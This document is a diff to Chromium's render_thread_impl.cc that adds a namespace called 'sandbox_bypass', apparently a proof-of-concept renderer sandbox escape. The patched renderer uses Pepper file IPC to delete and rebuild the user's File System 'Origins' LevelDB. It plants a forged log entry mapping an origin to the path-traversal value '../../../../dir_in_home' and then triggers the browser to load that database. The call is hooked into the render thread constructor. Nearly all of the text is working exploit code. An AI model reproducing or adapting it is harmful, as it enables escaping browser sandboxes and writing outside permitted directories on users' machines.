--- render_thread_impl_old.cc 2012-11-20 13:13:42.909650808 -0800
|
+++ render_thread_impl.cc 2012-11-20 13:16:20.887079108 -0800
|
@@ -107,6 +107,14 @@
|
#include "ipc/ipc_channel_posix.h"
|
#endif
|
|
+#include "ppapi/proxy/pepper_file_messages.h"
|
+#include "ppapi/shared_impl/file_path.h"
|
+#include "base/file_path.h"
|
+#include "ipc/ipc_platform_file.h"
|
+#include "content/common/fileapi/file_system_messages.h"
|
+#include "chrome/common/chrome_paths_internal.h"
|
+#include "webkit/fileapi/file_system_types.h"
|
+
|
using WebKit::WebDocument;
|
using WebKit::WebFrame;
|
using WebKit::WebNetworkStateNotifier;
|
@@ -246,10 +254,130 @@
|
return lazy_tls.Pointer()->Get();
|
}
|
|
+namespace sandbox_bypass {
|
+
|
+typedef unsigned char u8;
|
+
|
+void Debug(const char *msg, int code) {
|
+ printf("DEBUG: %s, code=%d\n", msg, code);
|
+ fflush(stdout);
|
+ *(volatile unsigned *)0;
|
+}
|
+
|
+ppapi::PepperFilePath BuildPath(std::string rel) {
|
+ FilePath path;
|
+
|
+ chrome::GetDefaultUserDataDirectory(&path);
|
+ path = path.Append("Default/File System");
|
+ path = path.Append(rel);
|
+
|
+ return ppapi::PepperFilePath::MakeAbsolute(path);
|
+}
|
+
|
+void Rmdir(RenderThreadImpl *rend, std::string dir) {
|
+ base::PlatformFileError err;
|
+ rend->Send(new PepperFileMsg_DeleteFileOrDir(BuildPath(dir), true, &err));
|
+ if (err != base::PLATFORM_FILE_OK)
|
+ Debug("DeleteFileOrDir", (int)err);
|
+}
|
+
|
+void Mkdir(RenderThreadImpl *rend, std::string dir) {
|
+ base::PlatformFileError err;
|
+ rend->Send(new PepperFileMsg_CreateDir(BuildPath(dir), &err));
|
+ if (err != base::PLATFORM_FILE_OK)
|
+ Debug("CreateDir", (int)err);
|
+}
|
+
|
+base::PlatformFile Open(RenderThreadImpl *rend, std::string name) {
|
+ base::PlatformFileError err;
|
+ IPC::PlatformFileForTransit file;
|
+
|
+ rend->Send(new PepperFileMsg_OpenFile(BuildPath(name), 0x48, &err, &file));
|
+ if (err != base::PLATFORM_FILE_OK)
|
+ Debug("Open", (int)err);
|
+
|
+ return IPC::PlatformFileForTransitToPlatformFile(file);
|
+}
|
+
|
+void Write(base::PlatformFile file, u8 *buf, size_t len) {
|
+ int ret;
|
+
|
+ ret = base::WritePlatformFileAtCurrentPos(file, (const char *)buf, len);
|
+ if (ret < 0)
|
+ Debug("WritePlatformFileAtCurrentPos", ret);
|
+ if ((size_t)ret != len)
|
+ Debug("WritePlatformFileAtCurrentPos written!=len", ret);
|
+}
|
+
|
+void Close(base::PlatformFile file) {
|
+ base::ClosePlatformFile(file);
|
+}
|
+
|
+void CreateFile(RenderThreadImpl *rend, std::string name, u8 *data, size_t len) {
|
+ base::PlatformFile file;
|
+
|
+ file = Open(rend, name);
|
+ Write(file, data, len);
|
+ Close(file);
|
+}
|
+
|
+void Trigger(RenderThreadImpl *rend) {
|
+ rend->Send(new FileSystemHostMsg_Open(
|
+ 1,
|
+ GURL("http://www.example.com/"),
|
+ fileapi::kFileSystemTypeTemporary,
|
+ 0x100000,
|
+ true));
|
+}
|
+
|
+void CreateDirInHome(RenderThreadImpl *rend) {
|
+ u8 current[] = {'M', 'A', 'N', 'I', 'F', 'E', 'S', 'T', 0x0a};
|
+ u8 manifest[] = {
|
+ 0x56, 0xf9, 0xb8, 0xf8, 0x1c, 0x00, 0x01, 0x01,
|
+ 0x1a, 0x6c, 0x65, 0x76, 0x65, 0x6c, 0x64, 0x62,
|
+ 0x2e, 0x42, 0x79, 0x74, 0x65, 0x77, 0x69, 0x73,
|
+ 0x65, 0x43, 0x6f, 0x6d, 0x70, 0x61, 0x72, 0x61,
|
+ 0x74, 0x6f, 0x72, 0xa4, 0x9c, 0x8b, 0xbe, 0x08,
|
+ 0x00, 0x01, 0x02, 0x03, 0x09, 0x00, 0x03, 0x04,
|
+ 0x04, 0x00};
|
+ u8 log[] = {
|
+ 0x69, 0xc2, 0x4a, 0x46, 0x43, 0x00, 0x01, 0x01,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,
|
+ 0x00, 0x00, 0x00, 0x01, 0x1d, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x17, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
+ 0x00, 0x00};
|
+
|
+ // fake key value pair
|
+ memcpy(log + 0x15, "ORIGIN:http_www.example.com_0", 0x1d);
|
+ memcpy(log + 0x33, "../../../../dir_in_home", 0x17);
|
+
|
+ // remove old database
|
+ Rmdir(rend, "Origins");
|
+ Mkdir(rend, "Origins");
|
+
|
+ // create fake database
|
+ CreateFile(rend, "Origins/CURRENT", current, sizeof(current));
|
+ CreateFile(rend, "Origins/MANIFEST", manifest, sizeof(manifest));
|
+ CreateFile(rend, "Origins/000003.log", log, sizeof(log));
|
+
|
+ // load fake database
|
+ Trigger(rend);
|
+
|
+ Debug("done", 0);
|
+}
|
+
|
+}
|
+
|
// When we run plugins in process, we actually run them on the render thread,
|
// which means that we need to make the render thread pump UI events.
|
RenderThreadImpl::RenderThreadImpl() {
|
Init();
|
+ sandbox_bypass::CreateDirInHome(this);
|
}
|
|
RenderThreadImpl::RenderThreadImpl(const std::string& channel_name)
|